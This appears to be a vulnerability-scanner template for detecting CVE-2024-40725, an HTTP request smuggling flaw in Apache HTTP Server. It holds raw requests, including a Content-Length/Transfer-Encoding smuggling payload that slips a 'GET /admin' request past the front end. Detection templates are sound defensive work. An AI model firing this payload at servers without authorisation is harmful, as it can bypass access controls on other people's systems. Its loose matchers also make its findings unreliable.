CVE-2024-40725
Apache HTTP Server Request Smuggling
id: CVE-2024-40725
info:
name: Apache HTTP Server HTTP Request Smuggling (CVE-2024-40725)
author: Redflare Cyber
severity: high
description: Detects the presence of CVE-2024-40725 vulnerability in Apache HTTP Server using HTTP Request Smuggling techniques.
reference:
- https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898
tags: cve, http-request-smuggling, apache, mod_proxy
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: header
regex:
- "Server: Apache/2\\.4\\.[0-5][0-9]"
- "Server: Apache/2\\.4\\.6[0-1]"
name: server_version
matchers:
- type: regex
part: header
regex:
- "Server: Apache/2\\.4\\.[0-5][0-9]"
- "Server: Apache/2\\.4\\.6[0-1]"
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Connection: Keep-Alive, Proxy-Authenticate
matchers:
- type: regex
part: header
regex:
- "Proxy-Authenticate"
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Length: 0
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: {{Hostname}}
User-Agent: smuggle-test
matchers:
- type: word
part: body
words:
- "admin"
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "Server: Apache/2\\.4\\.[0-5][0-9]"
- "Server: Apache/2\\.4\\.6[0-1]"
name: server_version
Last updated